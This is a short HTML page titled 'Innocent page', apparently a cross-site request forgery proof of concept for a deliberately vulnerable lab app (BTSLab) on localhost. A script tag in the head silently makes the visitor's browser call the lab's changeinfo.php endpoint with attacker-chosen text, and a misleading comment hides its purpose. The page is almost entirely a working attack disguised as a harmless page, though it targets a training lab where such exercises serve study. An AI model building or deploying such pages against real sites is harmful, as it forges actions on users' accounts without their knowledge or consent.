<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
    <script src='http://localhost:8056/btslab/vulnerability/csrf/
    changeinfo.php?info=some%20slander%20and%20other%20bad%20stuff';>
    // noting interesting here watchout other stuff!
    </script>
</head>
<body>
    <h1>Innocent page</h1>
    <h2>Welcome</h2>
</body>
</html>